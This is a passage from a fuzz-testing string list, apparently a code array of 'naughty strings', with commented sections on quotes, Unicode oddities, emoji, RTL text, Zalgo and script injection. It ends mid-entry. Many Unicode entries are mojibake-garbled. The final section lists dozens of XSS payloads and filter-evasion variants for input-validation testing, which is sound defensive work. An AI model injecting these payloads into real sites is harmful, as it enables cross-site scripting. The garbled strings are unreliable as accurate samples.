"¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ " + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ " + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", + + // Quotation Marks + // + // Strings which contain misplaced quotation marks; can cause encoding errors + + "'", "\"", "''", "\"\"", "'\"'", "\"''''\"'\"", "\"'\"'\"''''\"", "<foo val=¬タワbar¬タン />", "<foo val=¬タワbar¬タン />", "<foo val=¬タンbar¬タワ />", + "<foo val=`bar' />", + + // Two-Byte Characters + // + // Strings which contain two-byte characters: can cause rendering issues or character-length issues + + "ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", " ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", + "¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", "←テᄄ│ミᄑ₩ᅠᄐ", "↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", + "↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ " + "→リᅠ→ᄚᄅ↑ᄚチ■ユリ", + "ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", "↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", + "ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", + + // Changing length when lowercased + // + // Characters which increase in length (2 to 3 bytes) when lowercased + // Credit: https://twitter.com/jifa/status/625776454479970304 + + "ᄎ", "ᄒ", + + // Japanese Emoticons + // + // Strings which consists of Japanese-style emoticons which are popular on the web + + " ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", + "(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", "ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", "__ᄒロ(,_,*)", + " ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", + "ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", + ", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", + "(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", + "(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", "¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", "( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", + + // Emoji + // + // Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + + "゚リヘ", "゚ムᄅ゚マᄑ", "゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", + "゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", + "¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ " + "゚メル", + "¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", + "゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", + "0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ " + "゚ヤ゚", + + // Regional Indicator Symbols + // + // Regional Indicator Symbols can be displayed differently across + // fonts, and have a number of special behaviors + + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", + + // Unicode Numbers + // + // Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + + "ᄐムᄐメᄐモ", "ᄀᄁᆪ", + + // Right-To-Left Strings + // + // Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + + "ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ " + "ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ " + "ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ " + "ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ " + "ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", + "ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", + "ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", "ᄋᄑ", + "ᄋᄎ", + "ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ " + "ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ " + "ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ " + "ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", + + // Trick Unicode + // + // Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + + "¬タᆰ¬タᆰtest¬タᆰ", "¬タᆱtest¬タᆱ", "¬タᄅtest¬タᄅ", "test¬チᅠtest¬タᆱ", "¬チᆭtest¬チᄃ", + + // Zalgo Text + // + // Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + + "£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ " + "ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ " + "ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ " + "ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", + "ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ " + "ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ " + "ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ." + "ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", + "ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ " + "ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ " + "ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf " + "ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", + "ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ " + "ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ " + "ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", + "Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", + + // Unicode Upsidedown + // + // Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) + + "ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン " + "ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ " + "ᆵᅦンᄍoᅨᆬ", + "00ᅨルᅥヨ$-", + + // Unicode font + // + // Strings which contain bold/italic/etc. versions of normal characters + + "ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ " + "ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", + "ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ " + "ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ " + "ンミンンミᄄンミᅠ", + "ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ " + "ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ " + "ンヨノンヨヤンヨフ", + "ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ " + "ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ " + "ンメナンメミンメネ", + "ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ " + "ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ " + "ンモᆳンモᄌンモᄚ", + "ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ " + "ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ " + "ンユユンユᅠンユリ", + "ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ " + "ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ " + "ンレヘンレリンレミ", + "¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ " + "¬メ゚¬メᆰ¬メᄁ", + + // Script Injection + // + // Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + + "<script>alert(123)</script>", "<script>alert('123');</script>", "<img src=x onerror=alert(123) />", + "<svg><script>123<1>alert(123)</script>", "\"><script>alert(123)</script>", "'><script>alert(123)</script>", "><script>alert(123)</script>", + "</script><script>alert(123)</script>", "< / script >< script >alert(123)< / script >", " onfocus=JaVaSCript:alert(123) autofocus", + "\" onfocus=JaVaSCript:alert(123) autofocus", "' onfocus=JaVaSCript:alert(123) autofocus", "ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", + "<sc<script>ript>alert(123)</sc</script>ript>", "--><script>alert(123)</script>", "\";alert(123);t=\"", "';alert(123);t='", "JavaSCript:alert(123)", + ";alert(123);", "src=JaVaSCript:prompt(132)", "\"><script>alert(123);</script x=\"", "'><script>alert(123);</script x='", "><script>alert(123);</script x=", + "\" autofocus onkeyup=\"javascript:alert(123)", "' autofocus onkeyup='javascript:alert(123)", + "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", "'`\"><\\x3Cscript>javascript:alert(1)</script>", + "'`\"><\\x00script>javascript:alert(1)</script>", "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", + "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", + "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x02javascript:javascript:alert(1)\" 